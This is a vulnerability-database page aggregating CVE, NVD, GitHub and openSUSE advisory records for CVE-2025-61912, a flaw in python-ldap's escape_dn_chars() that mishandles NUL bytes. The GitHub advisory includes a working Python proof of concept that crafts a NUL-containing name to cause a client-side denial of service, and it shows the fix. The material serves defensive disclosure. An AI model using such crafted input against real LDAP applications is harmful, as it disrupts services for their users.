CVE-2025-61912 (GCVE-0-2025-61912)

Vulnerability from cvelistv5

Published

2025-10-10 22:04

Modified

2025-10-14 14:58

Severity ?

5.5 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P

CWE

CWE-116 - Improper Encoding or Escaping of Output
CWE-170 - Improper Null Termination

Summary

python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, ldap.dn.escape_dn_chars() escapes \x00 incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form \00. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service. Version 3.4.5 contains a patch for the issue.

References

URL

Tags

	security-advisories@github.com	https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f
	security-advisories@github.com	https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5
	security-advisories@github.com	https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6

Impacted products

	Vendor	Product	Version
	python-ldap	python-ldap	Version: < 3.4.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-61912",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-14T14:57:58.750366Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-14T14:58:06.682Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "python-ldap",
          "vendor": "python-ldap",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.4.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, ldap.dn.escape_dn_chars() escapes \\x00 incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form \\00. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service. Version 3.4.5 contains a patch for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-116",
              "description": "CWE-116: Improper Encoding or Escaping of Output",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-170",
              "description": "CWE-170: Improper Null Termination",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-10T22:04:25.028Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6"
        },
        {
          "name": "https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f"
        },
        {
          "name": "https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5"
        }
      ],
      "source": {
        "advisory": "GHSA-p34h-wq7j-h5v6",
        "discovery": "UNKNOWN"
      },
      "title": "python-ldap Vulnerable to Improper Encoding or Escaping of Output and Improper Null Termination"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-61912",
    "datePublished": "2025-10-10T22:04:25.028Z",
    "dateReserved": "2025-10-03T22:21:59.614Z",
    "dateUpdated": "2025-10-14T14:58:06.682Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-61912\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-10T22:15:37.637\",\"lastModified\":\"2025-10-14T19:36:59.730\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, ldap.dn.escape_dn_chars() escapes \\\\x00 incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form \\\\00. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service. Version 3.4.5 contains a patch for the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"LOW\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-116\"},{\"lang\":\"en\",\"value\":\"CWE-170\"}]}],\"references\":[{\"url\":\"https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-61912\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-14T14:57:58.750366Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-14T14:58:03.726Z\"}}], \"cna\": {\"title\": \"python-ldap Vulnerable to Improper Encoding or Escaping of Output and Improper Null Termination\", \"source\": {\"advisory\": \"GHSA-p34h-wq7j-h5v6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"LOW\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"python-ldap\", \"product\": \"python-ldap\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.4.5\"}]}], \"references\": [{\"url\": \"https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6\", \"name\": \"https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f\", \"name\": \"https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5\", \"name\": \"https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, ldap.dn.escape_dn_chars() escapes \\\\x00 incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form \\\\00. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service. Version 3.4.5 contains a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-116\", \"description\": \"CWE-116: Improper Encoding or Escaping of Output\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-170\", \"description\": \"CWE-170: Improper Null Termination\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-10T22:04:25.028Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-61912\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-14T14:58:06.682Z\", \"dateReserved\": \"2025-10-03T22:21:59.614Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-10T22:04:25.028Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

fkie_cve-2025-61912

Vulnerability from fkie_nvd

Published

2025-10-10 22:15

Modified

2025-10-14 19:36

Severity ?

5.5 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f
	security-advisories@github.com	https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5
	security-advisories@github.com	https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, ldap.dn.escape_dn_chars() escapes \\x00 incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form \\00. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service. Version 3.4.5 contains a patch for the issue."
    }
  ],
  "id": "CVE-2025-61912",
  "lastModified": "2025-10-14T19:36:59.730",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.5,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "LOW",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-10-10T22:15:37.637",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-116"
        },
        {
          "lang": "en",
          "value": "CWE-170"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

ghsa-p34h-wq7j-h5v6

Vulnerability from github

Published

2025-10-10 22:53

Modified

2025-10-13 15:47

Severity ?

5.5 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P

Summary

python-ldap is Vulnerable to Improper Encoding or Escaping of Output and Improper Null Termination

Details

Summary

ldap.dn.escape_dn_chars() escapes \x00 incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form \00. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service.

Details

Affected function: ldap.dn.escape_dn_chars(s)

File: Lib/ldap/dn.py

Buggy behavior: For NUL, the function does:

s = s.replace('\000', '\\\000') # backslash + literal NUL

This produces Python strings which, when passed to python-ldap APIs (e.g., add_s, modify_s, rename_s, or used as search bases), contain an embedded NUL. python-ldap then raises ValueError: embedded null character (or otherwise fails) before any network I/O. With correct RFC-4514 encoding (\00), the client proceeds and the server can apply its own syntax rules (e.g., AD will reject NUL in CN with result: 34), proving the failure originates in the escaping helper.

Why it matters: Projects follow the docs which state this function “should be used when building LDAP DN strings from arbitrary input.” The function’s guarantee is therefore relied upon as a safety API. A single NUL in attacker-controlled input reliably breaks client workflows (crash/unhandled exception, stuck retries, poison queue record), i.e., a DoS.

Standards: RFC 4514 requires special characters and controls to be escaped using hex form; a literal NUL is not a valid DN character.

Minimal fix: Escape NUL as hex:

s = s.replace('\x00', r'\00')

PoC

Prereqs: Any python-ldap install and a reachable LDAP server (for the second half). The first half (client-side failure) does not require a live server.

```import ldap from ldap.dn import escape_dn_chars, str2dn

l = ldap.initialize("ldap://10.0.1.11") # your lab DC/LDAP l.protocol_version = 3 l.set_option(ldap.OPT_REFERRALS, 0) l.simple_bind_s(r"DSEC\dani.aga", "PassAa1")

--- Attacker-controlled value contains NUL ---

cn = "bad\0name" escaped_cn = escape_dn_chars(cn) dn = f"CN={escaped_cn},OU=Users,DC=dsec,DC=local" attrs = [('objectClass', [b'user']), ('sAMAccountName', [b'badsam'])]

print("=== BUGGY DN (contains literal NUL) ===") print("escaped_cn repr:", repr(escaped_cn)) print("dn repr:", repr(dn)) print("contains NUL?:", "\x00" in dn, "at index:", dn.find("\x00"))

print("=> add_s(buggy DN): expected client-side failure (no server contact)") try: l.add_s(dn, attrs) print("add_s(buggy): succeeded (unexpected)") except Exception as e: print("add_s(buggy):", type(e).name, e) # ValueError: embedded null character

--- Correct hex escape demonstrates the client proceeds to the server ---

safe_dn = dn.replace("\x00", r"\00") # RFC 4514-compliant print("\n=== HEX-ESCAPED DN (\00) ===") print("safe_dn repr:", repr(safe_dn)) print("=> sanity parse:", str2dn(safe_dn)) # parses locally

print("=> add_s(safe DN): reaches server (AD will likely reject with 34)") try: l.add_s(safe_dn, attrs) print("add_s(safe): success (unlikely without required attrs/rights)") except ldap.LDAPError as e: print("add_s(safe):", e.class.name, e) # e.g., result 34 Invalid DN syntax (AD forbids NUL in CN) ```

Observed result (example):

add_s(buggy): ValueError embedded null character ← client-side DoS

add_s(safe): INVALID_DN_SYNTAX (result 34, BAD_NAME) ← request reached server; rejection due to server policy, not client bug

Impact

Type: Denial of Service (client-side).

Who is impacted: Any application that uses ldap.dn.escape_dn_chars() to build DNs from (partially) untrusted input—e.g., user creation/rename tools, sync/ETL jobs, portals allowing self-service attributes, device onboarding, batch imports. A single crafted value with \x00 reliably forces exceptions/failures and can crash handlers or jam pipelines with poison records.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "python-ldap"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.4.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61912"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-170"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-10T22:53:25Z",
    "nvd_published_at": "2025-10-10T22:15:37Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\n\n`ldap.dn.escape_dn_chars()` escapes `\\x00` incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form `\\00`. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service.\n\n\n\n### Details\n\n\n\nAffected function: `ldap.dn.escape_dn_chars(s)`\n\nFile: Lib/ldap/dn.py\n\nBuggy behavior:\nFor NUL, the function does:\n\n`s = s.replace(\u0027\\000\u0027, \u0027\\\\\\000\u0027)  # backslash + literal NUL`\n\nThis produces Python strings which, when passed to python-ldap APIs (e.g., `add_s`, `modify_s`, r`ename_s`, or used as search bases), contain an embedded NUL. python-ldap then raises ValueError: embedded null character (or otherwise fails) before any network I/O.\nWith correct RFC-4514 encoding (`\\00`), the client proceeds and the server can apply its own syntax rules (e.g., AD will reject NUL in CN with result: 34), proving the failure originates in the escaping helper.\n\nWhy it matters: Projects follow the docs which state this function \u201cshould be used when building LDAP DN strings from arbitrary input.\u201d The function\u2019s guarantee is therefore relied upon as a safety API. A single NUL in attacker-controlled input reliably breaks client workflows (crash/unhandled exception, stuck retries, poison queue record), i.e., a DoS.\n\nStandards: RFC 4514 requires special characters and controls to be escaped using hex form; a literal NUL is not a valid DN character.\n\nMinimal fix: Escape NUL as hex:\n\n`s = s.replace(\u0027\\x00\u0027, r\u0027\\00\u0027)`\n\n\n\n### PoC\n\nPrereqs: Any python-ldap install and a reachable LDAP server (for the second half). The first half (client-side failure) does not require a live server.\n\n```import ldap\nfrom ldap.dn import escape_dn_chars, str2dn\n\nl = ldap.initialize(\"ldap://10.0.1.11\")              # your lab DC/LDAP\nl.protocol_version = 3\nl.set_option(ldap.OPT_REFERRALS, 0)\nl.simple_bind_s(r\"DSEC\\dani.aga\", \"PassAa1\")         \n\n# --- Attacker-controlled value contains NUL ---\ncn = \"bad\\0name\"\nescaped_cn = escape_dn_chars(cn)\ndn = f\"CN={escaped_cn},OU=Users,DC=dsec,DC=local\"\nattrs = [(\u0027objectClass\u0027, [b\u0027user\u0027]), (\u0027sAMAccountName\u0027, [b\u0027badsam\u0027])]\n\nprint(\"=== BUGGY DN (contains literal NUL) ===\")\nprint(\"escaped_cn repr:\", repr(escaped_cn))\nprint(\"dn repr:\", repr(dn))\nprint(\"contains NUL?:\", \"\\x00\" in dn, \"at index:\", dn.find(\"\\x00\"))\n\nprint(\"=\u003e add_s(buggy DN): expected client-side failure (no server contact)\")\ntry:\n    l.add_s(dn, attrs)\n    print(\"add_s(buggy): succeeded (unexpected)\")\nexcept Exception as e:\n    print(\"add_s(buggy):\", type(e).__name__, e)  # ValueError: embedded null character\n\n# --- Correct hex escape demonstrates the client proceeds to the server ---\nsafe_dn = dn.replace(\"\\x00\", r\"\\00\")                 # RFC 4514-compliant\nprint(\"\\n=== HEX-ESCAPED DN (\\\\00) ===\")\nprint(\"safe_dn repr:\", repr(safe_dn))\nprint(\"=\u003e sanity parse:\", str2dn(safe_dn))           # parses locally\n\nprint(\"=\u003e add_s(safe DN): reaches server (AD will likely reject with 34)\")\ntry:\n    l.add_s(safe_dn, attrs)\n    print(\"add_s(safe): success (unlikely without required attrs/rights)\")\nexcept ldap.LDAPError as e:\n    print(\"add_s(safe):\", e.__class__.__name__, e)  # e.g., result 34 Invalid DN syntax (AD forbids NUL in CN)\n```\n\nObserved result (example):\n\n`add_s(buggy): ValueError embedded null character` \u2190 client-side DoS\n\n`add_s(safe): INVALID_DN_SYNTAX (result 34, BAD_NAME)` \u2190 request reached server; rejection due to server policy, not client bug\n\n\n### Impact\n\nType: Denial of Service (client-side).\n\nWho is impacted: Any application that uses ldap.dn.escape_dn_chars() to build DNs from (partially) untrusted input\u2014e.g., user `creation/rename tools`, `sync/ETL jobs`, portals allowing self-service attributes, device onboarding, batch imports. A single crafted value with `\\x00` reliably forces exceptions/failures and can crash handlers or jam pipelines with poison records.",
  "id": "GHSA-p34h-wq7j-h5v6",
  "modified": "2025-10-13T15:47:44Z",
  "published": "2025-10-10T22:53:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/python-ldap/python-ldap/security/advisories/GHSA-p34h-wq7j-h5v6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61912"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python-ldap/python-ldap/commit/6ea80326a34ee6093219628d7690bced50c49a3f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/python-ldap/python-ldap"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python-ldap/python-ldap/releases/tag/python-ldap-3.4.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "python-ldap is Vulnerable to Improper Encoding or Escaping of Output and Improper Null Termination"
}

opensuse-su-2025:15637-1

Vulnerability from csaf_opensuse

Published

2025-10-15 00:00

Modified

2025-10-15 00:00

Summary

python311-ldap-3.4.5-1.1 on GA media

Notes

Title of the patch

python311-ldap-3.4.5-1.1 on GA media

Description of the patch

These are all security issues fixed in the python311-ldap-3.4.5-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2025-15637

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python311-ldap-3.4.5-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python311-ldap-3.4.5-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-15637",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15637-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-61911 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-61911/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-61912 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-61912/"
      }
    ],
    "title": "python311-ldap-3.4.5-1.1 on GA media",
    "tracking": {
      "current_release_date": "2025-10-15T00:00:00Z",
      "generator": {
        "date": "2025-10-15T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:15637-1",
      "initial_release_date": "2025-10-15T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-10-15T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-ldap-3.4.5-1.1.aarch64",
                "product": {
                  "name": "python311-ldap-3.4.5-1.1.aarch64",
                  "product_id": "python311-ldap-3.4.5-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-ldap-3.4.5-1.1.aarch64",
                "product": {
                  "name": "python312-ldap-3.4.5-1.1.aarch64",
                  "product_id": "python312-ldap-3.4.5-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-ldap-3.4.5-1.1.aarch64",
                "product": {
                  "name": "python313-ldap-3.4.5-1.1.aarch64",
                  "product_id": "python313-ldap-3.4.5-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-ldap-3.4.5-1.1.ppc64le",
                "product": {
                  "name": "python311-ldap-3.4.5-1.1.ppc64le",
                  "product_id": "python311-ldap-3.4.5-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-ldap-3.4.5-1.1.ppc64le",
                "product": {
                  "name": "python312-ldap-3.4.5-1.1.ppc64le",
                  "product_id": "python312-ldap-3.4.5-1.1.ppc64le"
                }
              },
              {
